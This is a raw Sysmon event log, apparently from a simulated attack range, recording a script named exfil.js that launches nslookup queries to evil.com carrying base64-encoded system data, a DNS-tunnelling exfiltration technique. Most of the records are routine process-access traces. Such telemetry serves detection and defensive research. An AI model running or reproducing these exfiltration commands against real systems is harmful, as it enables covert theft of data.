14:16:17.380{2E1864BB-17B1-629A-DA3E-000000005F02}9848032C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-D93E-000000005F02}7788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.350{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-DA3E-000000005F02}984C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.333{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D93E-000000005F02}7788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.333{2E1864BB-17A1-629A-783D-000000005F02}55527756C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-D93E-000000005F02}7788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.345{2E1864BB-17B1-629A-D93E-000000005F02}7788C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqmjl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.333{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloqlkwr.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-17B1-629A-D73E-000000005F02}14326072C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-D83E-000000005F02}7212C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D83E-000000005F02}7212C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-17B1-629A-D63E-000000005F02}73685124C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-D83E-000000005F02}7212C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.277{2E1864BB-17B1-629A-D83E-000000005F02}7212C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-D63E-000000005F02}7368C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloqlkwr.tmp 2>&1 10341000x8000000000000000196677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.227{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-D73E-000000005F02}1432C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.227{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-D73E-000000005F02}1432C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.207{2E1864BB-17B1-629A-D73E-000000005F02}14326072C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-D63E-000000005F02}7368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.176{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.176{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.176{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D73E-000000005F02}1432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.176{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-D63E-000000005F02}7368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.176{2E1864BB-17A1-629A-783D-000000005F02}55525700C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-D63E-000000005F02}7368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.176{2E1864BB-17B1-629A-D63E-000000005F02}7368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloqlkwr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.161{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11374754D93F861677048144A3AB2519,SHA256=CCC87AD5A04B0A0D8922033F7ED5B4E18B29AB66CF6F16A4159A4BFC7660EDFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000196665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.161{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuuqt.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000196664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52356- 354300x8000000000000000196663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.545{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-52356-false127.0.0.1-53domain 354300x8000000000000000196662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.417{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52355- 354300x8000000000000000196661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.416{00000000-0000-0000-0000-000000000000}5912<unknown 